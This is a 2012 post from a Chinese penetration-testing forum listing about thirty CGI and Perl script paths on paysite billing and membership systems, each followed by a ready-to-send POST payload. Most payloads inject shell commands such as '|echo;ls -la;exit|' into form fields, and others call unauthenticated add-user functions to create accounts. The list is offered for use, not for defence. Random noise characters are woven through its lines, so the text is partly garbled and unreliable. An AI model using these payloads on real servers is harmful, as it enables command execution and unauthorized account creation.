找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Cgi-bin 30个漏洞+使用方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2568|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================+ ], B& J0 n9 ]+ H  w2 ~* c

! S* x! o* i, F. J$ Y% c5 w6 f/smspass.pl
' t0 n# I2 W5 ~, wusername=username&password=password
; U( J4 x# M, f5 j  N4 {8 I- N( {/ z9 R0 m
/index.cgi  _8 f9 y/ S  _; a) e
wei=ren&gen=command
: D* ?& L7 E, |" F# h( O/ x; h* H4 w* G! Q
/passmaster.cgi( \2 y0 g' |: z4 s( d
Action=Add&Username=Username&Password=Password4 Q* }# u+ v% d2 w3 Z

4 V7 ?  a2 Z/ D* n1 C/accountcreate.cgi
2 k9 u0 E1 _% S( }" U' B" A7 tusername=username&password=password&ref1=|echo;ls|
# p: J/ \' v( y0 t; d0 F
/ H: D% `) {8 n4 y' V$ L/form.cgi
9 C8 h" A3 s! L& v- P- lname=xxxx&email=email&subject=xxxx&response=|echo;ls|1 m. y7 Q# t, u# i7 C
0 ~) ^9 U- Y( U# i9 y. d+ @) {5 S. E5 K
/addusr.pl6 W' w3 H' f4 x5 Q/ d* ^
/cgi-bin/EuroDebit/addusr.pl$ g& q! V8 C( d
user=username&pass=Password&confirm=Password
8 I) d- [( C0 `/ S. W$ l1 h+ }& F$ U: M. I. q$ D' y
/ccbill-local.asp
1 [& M/ ]4 @: U/ ?$ x3 vpost_values=username:password& b5 P% g8 p4 R2 U) P) Y

& }4 D- k' B1 _2 q9 h3 T/count.cgi
' r! O' z- V' J6 g" c# }pinfile=|echo;ls -la;exit|2 a$ y* N9 @8 m% W' T
( }1 J( L  N) O  i1 o
/recon.cgi7 [5 q3 |9 f- n. U
/recon.cgi?search
. `3 h  e, p; C1 W1 R- U2 h/ }7 l7 hsearchoption=1&searchfor=|echo;ls -al;exit|4 o5 R; x4 |  Y! f4 F" [
. L- @1 p: e& q7 Q; |; Z6 h3 l9 {
/verotelrum.pl4 m5 Q5 L# I' f: n, H' s
vercode=username:password:dseegsow:add:amount<&30>
% a; l. L& a( n1 b' f3 A: o) @$ _7 [0 [! i7 Y  K+ J: p6 i- A! {' o
/af.cgi
( ^* r: k) x  p' `4 Q$ w+ ]_browser_out=|echo;ls -la;exit;|) w7 q; C) Q) \2 }4 |, H9 t6 _2 H
( A6 [) O7 g4 L/ }5 d  J
/modify.cgi9 F9 C% l2 C; g! E0 s4 J, o
username=username&password=password&expire=302 o  ~9 m: w1 c% B3 {! v: ^, N
6 r- U! b0 J2 K/ u# ]7 e+ p
/openjournal.cgi% t6 f  M/ @( E* `: t# n# t
edit=1&ct=2&go=|echo;ls -al;exit|/ m' w1 d, ~9 S

+ B( w- s( x4 c8 i/gx9passwd.cgi
; z) A7 a+ Z* vcmd=ADD&user=username&pass=password- @( i2 U2 |8 m+ l
1 F9 W( b, u; Y! D4 h( p
/probecontrol.cgi
0 J* g4 S3 e  m8 y% ?7 Zcommand=enable&username=username&password=password
. Q! O4 z/ A$ Y1 o8 Z3 x  ?: N
- ]! W' i* s3 m) o/recon.cgi" Y6 |. u4 R# O; G, i
searchoption=3&searchfor=echo;ls -la;exit6 \- d7 |' V/ _6 s$ N4 y9 }  D
. P+ \; W2 \* s$ f4 [+ y
/htadd.pl
* e1 I8 A# d$ V2 U: K* _configfile=|echo; ls -alt; exit
$ x* t) |. f- _9 y5 k# _$ q1 l0 W1 N" q
/gx9passwd.cgi
4 }! F- D" C3 b! S+ v! Mcmd=ADD&user=username&pass=password4 e& |3 u8 D( g# C. K
+ Y8 t: W) G2 D
/ibill*.pl4 B- y0 J9 e8 V$ I5 M! a: M9 E
reqtype=add&authpwd=authpwd&username=username&password=password0 q8 k" v7 ^" d2 y
3 m7 J$ v9 S- ^
/cpay.cgi  z% R# L0 z/ Z1 n5 k8 P
command=add_member&username=username(EMAIL)&password=password(DES)! ^- T- J! B) j, K# \6 v9 f
; c& z6 w& g, J' ]# |6 @7 g" f
/globill_ut.cgi8 @& {  j  q$ H: z6 S; A) q. X
do=add&username=username&password=password&wpassword=password
8 Q  W- z' _/ a: j7 Y  d6 x
6 Z6 l* b/ }9 @1 H: `- G9 f/usercontrol.cgi
8 @5 |9 b% n% e+ D; p5 mcommand=enable&username=USER&password=PASS  j2 W4 G8 E; u
8 e8 x  d3 k: t1 r5 d) X9 I
/globoSALErum.cgi
; Z( R* a( u* X" F* V! v9 Taction=ADD&seccode=seccode&login=username&password=password+ T! U$ b) i8 r1 i3 U4 p1 U! f! b

2 P  e/ ~8 b1 V8 @1 B$ K+ ^" D/addusr.pl
% Z9 ?+ P4 s0 w% Ouser=USER&pass=PASS&confirm=PASS) z# L4 d7 l; t! |8 q* @

0 v- L$ n( F1 W/pincount.cgi- m5 B. t$ j, B7 I& [: l( V
/cgi-bin/mastergate/pincount.cgi* g9 s5 O& h- V
pinfile=|echo;pwd;exit|/ ]# T7 _* W  K* l  V; Q$ x8 }

% e/ V8 X* d3 m% p7 i! v: ]. j8 ?/accountcreate.cgi9 D7 q* @7 F9 n- L
/cgi-bin/gateway/accountcreate.cgi: p+ h9 c+ I/ n7 }
username=username&password=password&password2=password&ref1=|echo;ls -al;exit- n1 R$ j3 S0 G% r
( U3 M7 X" L+ r; e' x1 o4 S
/af.cgi2 N; J; F$ [: b& d
/env.cgi
( D+ a9 Q7 m# c. V! j: VADD+;echo;pwd;exit: J  @1 l! e2 n. T: x! N4 n  ~

' M3 Y; j) U( s. K/count.cgi
2 L& {6 h/ I2 S* r( dpinfile=|echo;pwd;exit|1 P* F2 V* o8 E! W
( O- \- l9 W+ W5 @; y) g
/recon.cgi: Z/ z3 q/ R( L' F
searchoption=1&searchfor=|echo;ls%20-al;exit|
3 g+ p) ]5 L4 k. n- ~7 p6 D5 B) L2 T2 v* W$ }* x: \- l. ]
/add.cgi
; G* s* [2 |$ _9 C' [" lusername=username&password=password&expire=30" h+ j, A* T( ~; \
" Q# n. g) {3 m; M
==============================
/ N6 e# J7 l( A( l
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表